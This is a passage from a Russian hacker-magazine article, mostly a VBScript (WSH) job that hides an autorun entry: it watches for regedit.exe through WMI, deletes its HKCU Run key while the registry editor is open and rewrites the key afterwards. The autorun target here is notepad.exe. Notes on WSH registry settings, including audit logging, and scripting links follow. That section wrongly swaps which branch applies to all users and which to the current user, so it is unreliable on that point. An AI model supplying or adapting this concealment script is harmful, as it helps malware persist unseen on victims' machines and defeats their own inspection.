С петлей на шее

Анализирующий

Спецвыпуск Xakep, номер #040, стр. 040-084-5

<job id="T1">

<script language="VBScript">

<![CDATA[

'Объявляются используемые переменные и константы

Option explicit

Const x=0

Dim WshShell, prs1

Dim ProcName, LoadName

Dim Process, Processes

Dim Stime, RegPath

'Подключаются необходимые COM объекты

Set WshShell=WScript.CreateObject("WScript.Shell")

'Переменным присваиваются значения

RegPath="HKEY_CURRENT_USER\Software\Microsoft\WinDows\CurrentVersion\Run\notepad"

LoadName="notepad.exe"

ProcName=UCase("regedit.exe")

'Пауза между проверками в миллисекундах

Stime=500

'Функция мониторинга процессов

Function ProcExists(prs)

Set Processes=getobject("winmgmts:{impersonationlevel=impersonate}!root\cimv2").execquery ("select *from win32_Process")

For Each Process in Processes

If UCase(Process.description) = ProcName Then

ProcExists = True

Else

ProcExists = False

End If

Next

End Function

'Функция маскировки ссылки

Do While x=0

If ProcExists(prs1) = True Then

Set Processes=getobject("winmgmts:{impersonationlevel=impersonate}!root\cimv2").execquery ("select *from win32_Process")

For Each Process in Processes

If UCase(Process.description) = ProcName Then

WshShell.Regdelete RegPath

End If

Next

Do While ProcExists(prs1) = True

WScript.Sleep Stime*2

loop

Else

On Error Resume Next

WshShell.Regread RegPath

If Err<>0 Then

WshShell.RegWrite RegPath,LoadName,"REG_SZ"

End If

End If

WScript.Sleep Stime

Loop

]]>

</script>

</job>

Параметры реестра для Windows Script Host

Настройки режимов выполнения сценариев WSH располагаются в двух ветвях реестра:

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script Host\Settings] для всех пользователей данной машины и

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings] для текущего пользователя.

"IgnoreUserSettings"="1" – отменяет приоритет пользовательских настроек. Применим только к первой ветви.

"Enabled"="1" – разрешает выполнение сценариев.

"LogSecuritySuccesses"="1" – включает выполнение аудита успешных запусков в Журнал событий системы. Сохраняет информацию о каждом успешном запуске. Весьма полезный параметр – ни один скрипт не останется незамеченным.

"LogSecurityFailures"="1" - включает выполнение аудита отказов. В Журнал событий системы заносятся все попытки запуска криво написанных, либо слишком смелых сценариев. Явно не лишний параметр.

"DisplayLogo"="1" – разрешает отображение информации о версии WSH сервера.

Здесь можно найти информацию по WSH

ТИП: WWW

http://msdn.microsoft.com/scripting - без комментариев

www.borncity.de/WSHBazaar/ - сайт Гюнтера Борна, автора книг по WSH

www.win32scripting.com – ежемесячный журнал, посвященный администрированию Windows с использованием сценариев

http://scripting.winguides.com/ - статьи и примеры на VBScript и JScript

www.winscripter.com – гора информации, ссылок, примеров

www.activestate.com – если тебе не нравятся VBScript и JScript, то отсюда можно скачать модули поддержки Active Perl, Active Pyton, Active XSLT